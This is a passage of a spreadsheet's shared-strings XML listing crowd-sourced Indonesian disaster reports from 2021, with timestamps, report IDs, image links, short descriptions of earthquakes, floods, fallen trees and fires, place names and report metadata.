    <t>12:29:08.772</t>
  </si>
  <si>
    <t>65a19ede-f0e3-421a-8f40-b6882a43a89d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/65a19ede-f0e3-421a-8f40-b6882a43a89d.jpg</t>
  </si>
  <si>
    <t>Gempa terjadi pada pada pukul 04.18 WITA dengan kekuatan magnitudo 4,8 membuat longsor di bukit gunung batur. #Youth4GotongRotongAgus4DKRB"</t>
  </si>
  <si>
    <t>Batur Utara</t>
  </si>
  <si>
    <t>Kintamani</t>
  </si>
  <si>
    <t>Bangli</t>
  </si>
  <si>
    <t>10:55:56.113</t>
  </si>
  <si>
    <t>b31da9d1-34e7-4ed2-ac49-0e9dd178d8d7</t>
  </si>
  <si>
    <t>Gempa tersebut menyebabkan keretakan pada sebagian bangunan masyarakat</t>
  </si>
  <si>
    <t>07:50:09.559</t>
  </si>
  <si>
    <t>8395be86-182f-498e-9635-b75c3191905b</t>
  </si>
  <si>
    <t>Gempa yang pernah ada dii bali 4hari yang lalu</t>
  </si>
  <si>
    <t>07:10:35.548</t>
  </si>
  <si>
    <t>521598b5-db8d-43e7-9672-0c77ff63d7ef</t>
  </si>
  <si>
    <t>https://images.petabencana.id/521598b5-db8d-43e7-9672-0c77ff63d7ef.jpg</t>
  </si>
  <si>
    <t>Gempaaaa</t>
  </si>
  <si>
    <t>Ngis</t>
  </si>
  <si>
    <t>Manggis</t>
  </si>
  <si>
    <t>07:44:45.341</t>
  </si>
  <si>
    <t>25bd5c24-3057-42c0-8c8c-0849c1e85ef5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/25bd5c24-3057-42c0-8c8c-0849c1e85ef5.jpg</t>
  </si>
  <si>
    <t>Jalan rusak</t>
  </si>
  <si>
    <t>09:24:41.157</t>
  </si>
  <si>
    <t>4ea90fdc-5838-4fa9-aada-7d201b554707</t>
  </si>
  <si>
    <t>Jalanan retak harus ,sedikit hambatan dapat dilintasi sebagai</t>
  </si>
  <si>
    <t>12:21:23.989</t>
  </si>
  <si>
    <t>453434ce-3ca2-48ab-b6ac-2b6c2956650d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/453434ce-3ca2-48ab-b6ac-2b6c2956650d.jpg</t>
  </si>
  <si>
    <t>Kejadian gempa beberapa waktu lalu di daerah trunyan</t>
  </si>
  <si>
    <t>Terunyan</t>
  </si>
  <si>
    <t>08:08:38.705</t>
  </si>
  <si>
    <t>f4d49e39-b061-4b04-838f-547dc42d5ac7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f4d49e39-b061-4b04-838f-547dc42d5ac7.jpg</t>
  </si>
  <si>
    <t>Kejadian gempa dibali hari Sabtu tgl 16 Oktober 2021</t>
  </si>
  <si>
    <t>Tri Buana</t>
  </si>
  <si>
    <t>08:10:55.998</t>
  </si>
  <si>
    <t>cc12d653-9241-4e8f-9e93-519817e6be01</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cc12d653-9241-4e8f-9e93-519817e6be01.jpg</t>
  </si>
  <si>
    <t>07:45:14.987</t>
  </si>
  <si>
    <t>50e1b97c-5740-4249-841a-b03f17b3b058</t>
  </si>
  <si>
    <t>https://images.petabencana.id/50e1b97c-5740-4249-841a-b03f17b3b058.jpg</t>
  </si>
  <si>
    <t>Kejadian gempa pada tanggal 16/10/2021</t>
  </si>
  <si>
    <t>06:59:24.184</t>
  </si>
  <si>
    <t>84282c5d-0175-4faa-8d87-9ae86f36fbbf</t>
  </si>
  <si>
    <t>https://images.petabencana.id/84282c5d-0175-4faa-8d87-9ae86f36fbbf.jpg</t>
  </si>
  <si>
    <t>Kerusakan akibat gempa bumi</t>
  </si>
  <si>
    <t>07:47:29.865</t>
  </si>
  <si>
    <t>e86e7d2f-28e3-42e6-8c9d-108e5a039503</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e86e7d2f-28e3-42e6-8c9d-108e5a039503.jpg</t>
  </si>
  <si>
    <t xml:space="preserve">Kerusakan yang di akibatkan oleh gempa pada tanggal 15 Oktober 2021 pada jam 04:00 </t>
  </si>
  <si>
    <t>Laba Sari</t>
  </si>
  <si>
    <t>08:05:40.443</t>
  </si>
  <si>
    <t>6a8d518d-fc1e-4b31-a36e-4854e3488036</t>
  </si>
  <si>
    <t>{ "points": 1, "condition": 1, "report_type": "road", "accessabilityFailure": 0 }</t>
  </si>
  <si>
    <t>Menurut saya gempa ini sangat kuat pada waktu hari Jumat itu ya</t>
  </si>
  <si>
    <t>07:12:58.097</t>
  </si>
  <si>
    <t>fcf8d0a0-f4d1-466e-bcc6-b89507744e3a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fcf8d0a0-f4d1-466e-bcc6-b89507744e3a.jpg</t>
  </si>
  <si>
    <t>{ "points": 4, "report_type": "structure", "structureFailure": 1 }</t>
  </si>
  <si>
    <t>Pada  hari Sabtu tanggal 16 Oktober tahun 2021 telah terjadi gempa di kabupaten Karangasem yang membuat kerusakan pada bangunan penduduk</t>
  </si>
  <si>
    <t>07:29:38.657</t>
  </si>
  <si>
    <t>c116afd2-6ed1-43d1-9a8c-7892f30648d9</t>
  </si>
  <si>
    <t>Rusak bagian tengah jalan</t>
  </si>
  <si>
    <t>08:01:52.806</t>
  </si>
  <si>
    <t>eef292bc-fe3e-4fc5-8d33-87d96f597eed</t>
  </si>
  <si>
    <t>https://images.petabencana.id/eef292bc-fe3e-4fc5-8d33-87d96f597eed.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "report_type": "structure", "structureFailure": 2 }</t>
  </si>
  <si>
    <t>Salah satu warga rumahnya roboh akibat gempa</t>
  </si>
  <si>
    <t>Takmung</t>
  </si>
  <si>
    <t>Banjarangkan</t>
  </si>
  <si>
    <t>Klungkung</t>
  </si>
  <si>
    <t>08:15:49.498</t>
  </si>
  <si>
    <t>1a10b35f-c5b3-42c4-af13-7aa5a5051176</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "516", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Saya harap bisa dibantu buat orang orang yg mungkin rumahnya retak dan sebagian</t>
  </si>
  <si>
    <t>09:12:17.861</t>
  </si>
  <si>
    <t>65db4ad8-5ef3-4288-ade4-a10c5aafcfc2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/65db4ad8-5ef3-4288-ade4-a10c5aafcfc2.jpg</t>
  </si>
  <si>
    <t>Saya menjelaskan situasi kerusakan jalan akibat gempa bumi</t>
  </si>
  <si>
    <t>10:43:00.352</t>
  </si>
  <si>
    <t>63d653fb-0a2a-4038-a37f-d9079faa23d5</t>
  </si>
  <si>
    <t>{ "report_type": "road", "accessabilityFailure": 1, "condition": 1 }</t>
  </si>
  <si>
    <t>Semoga tidak terjadi gempa lagi</t>
  </si>
  <si>
    <t>03:51:26.861</t>
  </si>
  <si>
    <t>11b58e7b-9e32-405a-9cec-b05c361e1700</t>
  </si>
  <si>
    <t>https://images.petabencana.id/11b58e7b-9e32-405a-9cec-b05c361e1700.jpg</t>
  </si>
  <si>
    <t>Telah terjadi luapan air yang menyebabkan banjir sehingga akses jalan tidak bisa dilalui untuk saat ini.</t>
  </si>
  <si>
    <t>Lagan Bungin</t>
  </si>
  <si>
    <t>Talang Empat</t>
  </si>
  <si>
    <t>Bengkulu Tengah</t>
  </si>
  <si>
    <t>07:07:16.080</t>
  </si>
  <si>
    <t>7653dc08-5dde-4457-b61a-26939bebf78b</t>
  </si>
  <si>
    <t>Tidak ada kerusakan pada rumah</t>
  </si>
  <si>
    <t>08:31:21.660</t>
  </si>
  <si>
    <t>0239e7da-4f03-4c42-a94f-997f459c441c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0239e7da-4f03-4c42-a94f-997f459c441c.jpg</t>
  </si>
  <si>
    <t>09:24:51.042</t>
  </si>
  <si>
    <t>3f885aec-be10-47a2-898b-1edb8aa6565f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3f885aec-be10-47a2-898b-1edb8aa6565f.jpg</t>
  </si>
  <si>
    <t>10:02:24.368</t>
  </si>
  <si>
    <t>3c20c763-f5f4-4cc7-ab68-a7f95eac3d0d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3c20c763-f5f4-4cc7-ab68-a7f95eac3d0d.jpg</t>
  </si>
  <si>
    <t>Budakeling</t>
  </si>
  <si>
    <t>Bebandem</t>
  </si>
  <si>
    <t>12:46:59.360</t>
  </si>
  <si>
    <t>5a430a08-92ce-426f-b62f-8635b33bf218</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5a430a08-92ce-426f-b62f-8635b33bf218.jpg</t>
  </si>
  <si>
    <t>Songan B</t>
  </si>
  <si>
    <t>11:56:50.610</t>
  </si>
  <si>
    <t>a7066d68-1c08-4791-94ea-55560da4d3fc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a7066d68-1c08-4791-94ea-55560da4d3fc.jpg</t>
  </si>
  <si>
    <t>12:02:07.333</t>
  </si>
  <si>
    <t>dc1b509f-0dd4-442b-abbc-3ecc2e759641</t>
  </si>
  <si>
    <t>https://images.petabencana.id/dc1b509f-0dd4-442b-abbc-3ecc2e759641.jpg</t>
  </si>
  <si>
    <t>12:02:08.704</t>
  </si>
  <si>
    <t>a168e882-01e6-45e8-ba09-4243765cc35d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a168e882-01e6-45e8-ba09-4243765cc35d.jpg</t>
  </si>
  <si>
    <t>12:05:05.032</t>
  </si>
  <si>
    <t>182c86e9-b822-4461-9c4e-1ac076e83b3b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/182c86e9-b822-4461-9c4e-1ac076e83b3b.jpg</t>
  </si>
  <si>
    <t>13:01:14.314</t>
  </si>
  <si>
    <t>556caf4f-c7e4-466e-88de-9c133908c7ea</t>
  </si>
  <si>
    <t>https://images.petabencana.id/556caf4f-c7e4-466e-88de-9c133908c7ea.jpg</t>
  </si>
  <si>
    <t>14:19:22.347</t>
  </si>
  <si>
    <t>55929924-134e-4524-bd20-8ad0e4e2d079</t>
  </si>
  <si>
    <t>https://images.petabencana.id/55929924-134e-4524-bd20-8ad0e4e2d079.jpg</t>
  </si>
  <si>
    <t>Tianyar Tengah</t>
  </si>
  <si>
    <t>Kubu</t>
  </si>
  <si>
    <t>14:21:46.263</t>
  </si>
  <si>
    <t>c4237157-4289-4b11-a263-ba197fcdaee7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c4237157-4289-4b11-a263-ba197fcdaee7.jpg</t>
  </si>
  <si>
    <t>13:31:51.303</t>
  </si>
  <si>
    <t>fb060bba-38c4-495c-83c7-15720fde4bdb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fb060bba-38c4-495c-83c7-15720fde4bdb.jpg</t>
  </si>
  <si>
    <t>15:27:45.820</t>
  </si>
  <si>
    <t>dd022b10-7e4e-423c-8d74-2341dd20efbf</t>
  </si>
  <si>
    <t>23:30:56.916</t>
  </si>
  <si>
    <t>573acdda-54fb-4243-adb1-554733862398</t>
  </si>
  <si>
    <t>https://images.petabencana.id/573acdda-54fb-4243-adb1-554733862398.jpg</t>
  </si>
  <si>
    <t>04:31:21.583</t>
  </si>
  <si>
    <t>d04b08c4-5221-4600-89b5-e0d2051fa9c8</t>
  </si>
  <si>
    <t>­ƒÑ?­ƒÑ?­ƒÑ?</t>
  </si>
  <si>
    <t>03:12:54.294</t>
  </si>
  <si>
    <t>d9b1e6c3-4352-4054-a14f-eb432bee03c1</t>
  </si>
  <si>
    <t>Semoga tidak ada gempa susulan lagi</t>
  </si>
  <si>
    <t>Tiyingtali</t>
  </si>
  <si>
    <t>03:30:58.631</t>
  </si>
  <si>
    <t>aec2ccb2-3e16-49a1-a16a-a79648deaa65</t>
  </si>
  <si>
    <t>https://images.petabencana.id/aec2ccb2-3e16-49a1-a16a-a79648deaa65.jpg</t>
  </si>
  <si>
    <t>07:34:03.275</t>
  </si>
  <si>
    <t>0a53737a-34a9-44e0-9983-122306d1e1ee</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0a53737a-34a9-44e0-9983-122306d1e1ee.jpg</t>
  </si>
  <si>
    <t>Akibat Hujan deras disertai angin yang cukup kuat dan dengan intensitas hujan yang turun sangat tinggi dan drainase yang kurang baik</t>
  </si>
  <si>
    <t>Bansir Laut</t>
  </si>
  <si>
    <t>Pontianak Tenggara</t>
  </si>
  <si>
    <t>12:27:54.626</t>
  </si>
  <si>
    <t>7058f312-203e-4d23-894c-fc4c84d84111</t>
  </si>
  <si>
    <t>Banjir setinggi lutut</t>
  </si>
  <si>
    <t>11:49:19.062</t>
  </si>
  <si>
    <t>284e1e1d-a7f2-4a8d-bd82-0f545f8126b2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/284e1e1d-a7f2-4a8d-bd82-0f545f8126b2.jpg</t>
  </si>
  <si>
    <t>Karena hujan deras disertai angin,Pohon munggur D60cm tumbang, menghalangi akses jalan.sdh di kondisikan</t>
  </si>
  <si>
    <t>Karanglo</t>
  </si>
  <si>
    <t>Klaten Selatan</t>
  </si>
  <si>
    <t>07:46:32.994</t>
  </si>
  <si>
    <t>32cc2ef6-8be2-4acc-a907-8a36731324c0</t>
  </si>
  <si>
    <t>{ "points": 0, "fireRadius": { "lat": 0.902730, "lng": 123.335094 }, "report_type": "fire", "fireDistance": 125.967960, "fireLocation": { "lat": 0.902043, "lng": 123.335996 }, "personLocation": { "lat": 0.902022, "lng": 123.336017 } }</t>
  </si>
  <si>
    <t>Kebakaran Hutan &amp; Lahan yg terjadi pada Hari Selasa 10 Oktber 2021, waktu kejadian 12.31 Wita, di Gunung Hutan Bangele Desa Tote Dusun I,</t>
  </si>
  <si>
    <t>Tote</t>
  </si>
  <si>
    <t>Bolang Itang Barat</t>
  </si>
  <si>
    <t>Bolaang Mongondow Utara</t>
  </si>
  <si>
    <t>02:26:51.236</t>
  </si>
  <si>
    <t>c862298c-40af-4db2-8d04-7d28dd642639</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c862298c-40af-4db2-8d04-7d28dd642639.jpg</t>
  </si>
  <si>
    <t>Kejadian Angin Kencang Menyebabkan Bangunan Rumah Mengalami kerusakan</t>
  </si>
  <si>
    <t>Boroko</t>
  </si>
  <si>
    <t>Kaidipang</t>
  </si>
  <si>
    <t>01:21:08.229</t>
  </si>
  <si>
    <t>373b83fb-2bce-4a56-bb1d-82e0d8c6337a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/373b83fb-2bce-4a56-bb1d-82e0d8c6337a.jpg</t>
  </si>
  <si>
    <t>pohon tumbang menimpa rumah bagian mushola, kp. Bojonggerong desa sukamanah kec. Cibeber. 28_10_2021_05.22wib #GotongRoyongDigital #bpbdkuat</t>
  </si>
  <si>
    <t>Salagedang</t>
  </si>
  <si>
    <t>08:18:13.000</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/361989</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2021/10/28/16354090931471270606.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1483", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Waspada! Debit Air di Tanggul Hek Kramat Jati Meningkat</t>
  </si>
  <si>
    <t>Tampak peningkatan debit air di tanggul Hek, Kramat Jati. Warga sekitar harap tetap waspada saat curah hujan yang kian meningkat di musim penghujan pada akhir bulan Oktober ini.</t>
  </si>
  <si>
    <t>Ceger</t>
  </si>
  <si>
    <t>13:52:02.704</t>
  </si>
  <si>
    <t>41e29af5-24c6-488f-aa83-8525e2029272</t>
  </si>
  <si>
    <t>https://images.petabencana.id/41e29af5-24c6-488f-aa83-8525e2029272.jpg</t>
  </si>
  <si>
    <t>Kabar terbaru dari pa kades ciherang kec.karangtengah, hari ini jam 20.40 wib #banjirlagi"</t>
  </si>
  <si>
    <t>Sukasirna</t>
  </si>
  <si>
    <t>14:17:22.606</t>
  </si>
  <si>
    <t>934052c7-52a1-46c8-8bd0-5ce8e628fbb3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/934052c7-52a1-46c8-8bd0-5ce8e628fbb3.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "3006", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>Karena musim hujan yang biasanya terjadi dalam daerah pantura khususnya semarang.mengakibatakan kemacetan arus lalu lintas.</t>
  </si>
  <si>
    <t>Pleburan</t>
  </si>
  <si>
    <t>02:41:27.263</t>
  </si>
  <si>
    <t>735386c8-b8dd-4b07-b222-d8bd053bb02f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/735386c8-b8dd-4b07-b222-d8bd053bb02f.jpg</t>
  </si>
  <si>
    <t>Latihan Penggunaan Peta Bencana. id</t>
  </si>
  <si>
    <t>17:01:34.555</t>
  </si>
  <si>
    <t>a35a5602-fc17-4e3a-9804-b9c6befeb6ef</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a35a5602-fc17-4e3a-9804-b9c6befeb6ef.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "fireRadius": { "lat": 0.882015, "lng": 123.650404 }, "report_type": "fire", "fireDistance": 119.505544, "fireLocation": { "lat": 0.882508, "lng": 123.649449 }, "personLocation": { "lat": 0.879687, "lng": 123.644557 } }</t>
  </si>
  <si>
    <t>Ôûá  WAKTU Hari    :  Rabu Tanggal :  6 Oktober 2021 Pukul   :  09.30 Wita Ôûá  JENIS KEJADIAN Kebakaran Rumah Ôûá  LOKASI Dsn III Desa sa"</t>
  </si>
  <si>
    <t>Sangkub I</t>
  </si>
  <si>
    <t>Sangkub</t>
  </si>
  <si>
    <t>12:50:46.215</t>
  </si>
  <si>
    <t>8634b1f9-152d-4d76-8e9a-b97015dee524</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8634b1f9-152d-4d76-8e9a-b97015dee524.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "volcano", "volcanicSigns": [ 0, 1, 2, 3 ], "evacuationNumber": 3, "evacuationArea": false }</t>
  </si>
  <si>
    <t>Belinteng</t>
  </si>
  <si>
    <t>Sei Bingai</t>
  </si>
  <si>
    <t>Langkat</t>
  </si>
  <si>
    <t>14:05:40.803</t>
  </si>
  <si>
    <t>08f7049a-4447-46ce-b1ee-70c2d2481f55</t>
  </si>
  <si>
    <t>https://images.petabencana.id/08f7049a-4447-46ce-b1ee-70c2d2481f55.jpg</t>
  </si>
  <si>
    <t>15:34:39.000</t>
  </si>
  <si>
    <t>582175d2-560c-47ca-b17c-8cfa758857d5</t>
  </si>
  <si>
    <t>Banjir daerah vila nusa indah 1 jatiasih bekasi</t>
  </si>
  <si>
    <t>19:04:31.013</t>
  </si>
  <si>
    <t>cd5798d5-c703-4311-82b7-2f5a0c9ffb5a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cd5798d5-c703-4311-82b7-2f5a0c9ffb5a.jpg</t>
  </si>
  <si>
    <t>Ampar Bedang</t>
  </si>
  <si>
    <t>Binjai Hulu</t>
  </si>
  <si>
    <t>Sintang</t>
  </si>
  <si>
    <t>12:49:47.421</t>
  </si>
  <si>
    <t>e46ace71-4091-4863-a118-6e8b5eb8685e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e46ace71-4091-4863-a118-6e8b5eb8685e.jpg</t>
  </si>
  <si>
    <t>Akibat hujan deras di sertai angin mengakibatkan pohon trembesi tumbang di jalan raya kandangan temanggung menutup akses jalan</t>
  </si>
  <si>
    <t>Kedungumpul</t>
  </si>
  <si>
    <t>04:32:30.461</t>
  </si>
  <si>
    <t>a89a5575-64d9-4db3-893a-ca350f9687f4</t>
  </si>
  <si>
    <t>PE by me</t>
  </si>
  <si>
    <t>Cucum</t>
  </si>
  <si>
    <t>Kuta Baro</t>
  </si>
  <si>
    <t>Aceh Besar</t>
  </si>
  <si>
    <t>05:07:16.186</t>
  </si>
  <si>
    <t>954c39d2-0a64-4589-9867-0c4135f8ca77</t>
  </si>
  <si>
    <t>Banjir setelah jembatan geulumbok</t>
  </si>
  <si>
    <t>Kedai Runding</t>
  </si>
  <si>
    <t>01:19:20.993</t>
  </si>
  <si>
    <t>8d774889-c320-4ecb-8589-45fb384ed0be</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8d774889-c320-4ecb-8589-45fb384ed0be.jpg</t>
  </si>
  <si>
    <t>#angin</t>
  </si>
  <si>
    <t>05:57:04.171</t>
  </si>
  <si>
    <t>020e677c-97da-423f-9def-fb408e16b41b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/020e677c-97da-423f-9def-fb408e16b41b.jpg</t>
  </si>
  <si>
    <t>09.32 Jalan Cingised masih tergenang air dan lalulintas cukup padat. Cuaca cerah berawan. @Sultan_Lakbok</t>
  </si>
  <si>
    <t>Cisaranten Kulon</t>
  </si>
  <si>
    <t>01:11:39.144</t>
  </si>
  <si>
    <t>a210d916-840a-4a57-829f-d45c29c6be31</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a210d916-840a-4a57-829f-d45c29c6be31.jpg</t>
  </si>
  <si>
    <t>asa nembe sekelimus dugi ka banjir sepertos kieu.. #sikonBDG</t>
  </si>
  <si>
    <t>Batununggal</t>
  </si>
  <si>
    <t>Bandung Kidul</t>
  </si>
  <si>
    <t>01:20:05.464</t>
  </si>
  <si>
    <t>574405f5-b0c3-48e2-9d01-9a11952276f1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/574405f5-b0c3-48e2-9d01-9a11952276f1.jpg</t>
  </si>
  <si>
    <t>semalam di jl margacinta , jl pesantren dekat margahayu banjir cukup dalam @satia_nagara @infobdg @RESTABES_BDG @AtcsBandung</t>
  </si>
  <si>
    <t>12:07:18.489</t>
  </si>
  <si>
    <t>ed1d49e5-98a4-4edb-8bad-28b10db3a6f1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ed1d49e5-98a4-4edb-8bad-28b10db3a6f1.jpg</t>
  </si>
  <si>
    <t>Tanggul jebol di kp.babakan rawa kec rancaekek kab.bandung mengakibatkan 3 rumah rusak berat dan lainya rusak ringan</t>
  </si>
  <si>
    <t>00:59:43.566</t>
  </si>
  <si>
    <t>a01748b5-fcd2-4e39-bb79-96dbe5724f48</t>
  </si>
  <si>
    <t>banjir besar</t>
  </si>
  <si>
    <t>Kalibagor</t>
  </si>
  <si>
    <t>Banyumas</t>
  </si>
  <si>
    <t>10:41:24.586</t>
  </si>
  <si>
    <t>a7ab5458-8b62-459e-9afe-b0d586388d6f</t>
  </si>
  <si>
    <t>Prediksi banjir karena disebelah selatan banyak bangunan yang mepet dengan aliran sungai jadi sungai mengalami penyempitan</t>
  </si>
  <si>
    <t>Mersi</t>
  </si>
  <si>
    <t>Purwokerto Timur</t>
  </si>
  <si>
    <t>13:07:46.136</t>
  </si>
  <si>
    <t>6c483839-edb6-4b8f-a87d-644485883acc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6c483839-edb6-4b8f-a87d-644485883acc.jpg</t>
  </si>
  <si>
    <t>banjir bandang Sungai Brantas pasca hujan deras di hulu sore tadi menyebabkan beberapa rumah hanyut di Ds Sumberbrantas, Ds Buludendeng</t>
  </si>
  <si>
    <t>Tulungrejo</t>
  </si>
  <si>
    <t>Bumiaji</t>
  </si>
  <si>
    <t>10:08:19.253</t>
  </si>
  <si>
    <t>e91f7271-8a07-4322-bf0b-a55e5c166490</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e91f7271-8a07-4322-bf0b-a55e5c166490.jpg</t>
  </si>
  <si>
    <t>Banjir besar, banyak rumah yang hanyut. Belum ada keterangan jumlah korban jiea dan materi</t>
  </si>
  <si>
    <t>Bulukerto</t>
  </si>
  <si>
    <t>08:44:58.000</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/362047</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2021/11/01/16357562971326427732.jpg</t>
  </si>
  <si>
    <t>Sampah di Pinggir Jalan Arteri Jorr Jatiwarna Perlu Diangkut</t>
  </si>
  <si>
    <t>Di sebagian wilayah di Indonesia sudah memasuki musim penghujan dan serangan banjir pasti akan terjadi. Salah satu penanganan banjir adalah tentang sampah yang segera harus diberi perhatian lebih. Terlihat sampah berserakan dan tidak terurus di Jalan Art</t>
  </si>
  <si>
    <t>09:36:41.000</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/362049</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2021/11/01/362049-16357594011922734368.mp4-03.jpg</t>
  </si>
  <si>
    <t>Banjir Merendam Perumahan Bumi Nasio Indah Bekasi</t>
  </si>
  <si>
    <t>Hujan yang mengguyur Jabodetabek hari ini berimbas kepada banjir yang terjadi di beberapa titik, seperti di perumahan Bumi Nasio Indah, Bekasi. Para warga mulai mengevakuasi kendaraannya ke depan komplek lantaran air yang masuk ke perumahan tersebut cuku</t>
  </si>
  <si>
    <t>06:30:01.000</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/362039</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2021/11/01/362039-1635748201396946068.mp4-03.jpg</t>
  </si>
  <si>
    <t>Diguyur Hujan, Jalan Raya Bintara Tergenang Air Cukup Tinggi</t>
  </si>
  <si>
    <t>Mulai siang tadi Jabodetabek diguyur hujan dengan intensitas yang cukup tinggi. Di Jalan Raya Bintara, air hujan sudah meluap sampai kejalan menimbulkan genangan air yang cukup tinggi.</t>
  </si>
  <si>
    <t>03:24:00.914</t>
  </si>
  <si>
    <t>bdfd74d9-beb3-4d45-aa4f-d2c452785dd1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bdfd74d9-beb3-4d45-aa4f-d2c452785dd1.jpg</t>
  </si>
  <si>
    <t>Intensitas hujan disini rendahdan jauh dari banjir.</t>
  </si>
  <si>
    <t>Sebangar</t>
  </si>
  <si>
    <t>Mandau</t>
  </si>
  <si>
    <t>Bengkalis</t>
  </si>
  <si>
    <t>09:41:12.694</t>
  </si>
  <si>
    <t>2e11cf41-c082-414c-bf07-497fcb4d127d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2e11cf41-c082-414c-bf07-497fcb4d127d.jpg</t>
  </si>
  <si>
    <t>Banjir akibat derasnya hujan dan meluapnya air sungai di Kp. Neglasari RT.01/RW.02 hingga menggenangi rumah warga</t>
  </si>
  <si>
    <t>Tanahbaru</t>
  </si>
  <si>
    <t>08:55:19.878</t>
  </si>
  <si>
    <t>3ebceb22-e3ea-4200-b7d2-3e52aced31fb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3ebceb22-e3ea-4200-b7d2-3e52aced31fb.jpg</t>
  </si>
  <si>
    <t>Banjir Perumahan Pondok Rajeg Indah/LIPI 1, Pondok Rajeg Cibinong, Bogor, Jabar, dampak dari longsornya turap perumahan baru. (Pak Dadan)</t>
  </si>
  <si>
    <t>Rawa Panjang</t>
  </si>
  <si>
    <t>09:09:41.647</t>
  </si>
  <si>
    <t>5c81b27b-3578-4e33-baca-c172717d9d6b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5c81b27b-3578-4e33-baca-c172717d9d6b.jpg</t>
  </si>
  <si>
    <t>Banjir, merendam rumah warga akibat luapan sungai.</t>
  </si>
  <si>
    <t>00:58:32.401</t>
  </si>
  <si>
    <t>ee488b3f-47e0-4bc6-acf6-519ef5b9697b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ee488b3f-47e0-4bc6-acf6-519ef5b9697b.jpg</t>
  </si>
  <si>
    <t>Kebanjiran hanya rumah saya,3 kontrakan dan rumah kk sepupu saya. Karena tdk adanya saluran air dibelakang rmh yg mengakibatkan tembok jebol</t>
  </si>
  <si>
    <t>09:54:07.172</t>
  </si>
  <si>
    <t>ce46260c-dc79-4764-ad13-b011ece44cd2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ce46260c-dc79-4764-ad13-b011ece44cd2.jpg</t>
  </si>
  <si>
    <t>Luapan sungai kalibaru, merendam basecamp kalibaru rafting yang tepat berada di pinggir sungai kalibaru sukaraja kab bogor</t>
  </si>
  <si>
    <t>Cikeas</t>
  </si>
  <si>
    <t>03:28:59.687</t>
  </si>
  <si>
    <t>bb794f8b-dd3f-4960-bd4f-cb3c65763604</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bb794f8b-dd3f-4960-bd4f-cb3c65763604.jpg</t>
  </si>
  <si>
    <t>Bencana Banjir di Desa Busisingo Kec Sangkub Kab Bolaang Mongondow Utara Tahun 2021</t>
  </si>
  <si>
    <t>Pangkusa</t>
  </si>
  <si>
    <t>13:32:54.866</t>
  </si>
  <si>
    <t>d6b587d6-3419-43b8-a69f-98ca4460425e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d6b587d6-3419-43b8-a69f-98ca4460425e.jpg</t>
  </si>
  <si>
    <t>Kejadian Banjir di Desa Biontong Kec Bolangitang timur,pada hari Senin 15/11/21,Pkl 16.34 Wita akibat Cuaca Ekstrim.</t>
  </si>
  <si>
    <t>Biontong</t>
  </si>
  <si>
    <t>Bolang Itang Timur</t>
  </si>
  <si>
    <t>13:19:25.194</t>
  </si>
  <si>
    <t>1229e295-29de-49b2-a7ac-6babed0f047a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1229e295-29de-49b2-a7ac-6babed0f047a.jpg</t>
  </si>
  <si>
    <t>Laporan Kejadian Banjir di Kec Bolang Itang Timur Desa Biontong Kab Bol Mong Utara  pada hari Senin 15/11/2021 Akibat Cuaca Ekstrem."</t>
  </si>
  <si>
    <t>03:23:13.866</t>
  </si>
  <si>
    <t>ee719780-f79b-4c22-af52-7ae595dd33e0</t>
  </si>
  <si>
